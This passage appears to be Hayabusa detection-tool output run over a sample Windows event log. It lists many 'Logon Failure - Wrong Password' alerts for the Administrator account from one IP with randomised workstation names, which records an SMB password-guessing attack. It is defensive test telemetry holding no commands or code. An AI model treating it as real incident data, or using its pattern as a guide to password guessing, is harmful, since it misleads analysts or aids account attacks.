NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWRu7ZC1eo1nn0IQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M52CihyrQk9MOfCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xBKSOZwS6f9ofXu7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uT1LHJs7kyeMmTtd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7FvZhetkdjnZOSpq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0DDC7WfL5T4d01yT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1dUzuddZH3Stespw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LKpORcDX0ccf1xMq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u4RbbKttCYPld8RR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: joni643cVcuBZH9K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bqY6TkW782CWKtvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d8c1I63ULh17l0rN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cjOtMpWutC9qeSss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gmsFnerFYwXXe4Wt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rzIZ4vC0E2CYq5mc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.775 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0uZe50jJH0aj9xZi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LZM5UuxLymuAMJcw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iF1dq6UfuqpFpGkf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.938 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NQVTj9OLayvEg8dg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.987 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 98F9mULm7DsRUN49 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h6KjEOAdknvIMwOA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UHUu0OKm8fsHTnum : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esdoSyg6HkaSiJ0z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M4lnVe7qNVEspxFV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Phei86bKte1UCbMi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ehA1LQ2Rs0Wts9JW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.318 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WcXtnkpww8HlSBb3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y8U7FrQZgDvQ09Uq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.430 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UgWwCtz3Gnoq9zYd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mRNPwCogYrwSGeZf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6O9rWY8UGCbuhSwZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HuH4avUJ4AwqXTGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: japOFEaHgyT3T2fO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXpRMMNJRgjmd4km : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtTXA6BiiVyv42cj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wfYkwvNOfKj7rlTj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QzAZyceDjfmUOdz6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C0Qais0cF8avXJQ6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7KBM2fIEK6pEl7F2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N3stckaysFk58QAF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.017 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oVK4S15DDLWISQ7i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.070 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fAA1bFLD5YMohS9q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k5V3sfIsj4kYtaGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IJw4MBG0cvIz2fMR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AXJ0UBfKCzLXJ5y0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z3A2mmYGcjHBbX3M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oGlR6pBLnDrzMsqu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gv7nWzZ1HN9mgTya : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dnPUb3w2d7Ltif2E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GCWXdvBeDPpeKhWJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GN3OXSzQqLDF348i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AAWiBhYPNQ0RUuOX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.662 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V5CBG3hblqr8kvWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MDBaKpfYttm4H1gj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PNszt6piEznMlTdF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iqmBPOQIG6M1rZjX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BJs7tuZpsPMYJHOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LUT5oe2DwS5vW84K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3OTe0uiDHhf5GzRL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 71TuxFRZFyZEQp1S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRvTmizOLj3UUpD7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LnQEZPWaN2OkpTLa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnHR9DAtgzu561sx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DfBl3dbluZ7GiFum : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Hlgn7gsZwRvlXAk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eyHVPtGpnmmRjJuO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F0l3QC0rLt9yGaIe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XfEng3JgXLmgI8GN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.334 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ORIegzlkHy8AX6RW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AzS4xRnHKxSwz5sZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.415 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v0hA1XvRIlqwKG6g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mKXKkvlHvjRh33Vw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JIMTGRC5IQlkrG9c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.658 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NYcLsxwbg8LkGCuQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kmttijRBtXqEbU0W : IP Address: 192.168.198.149 : AuthPackage: 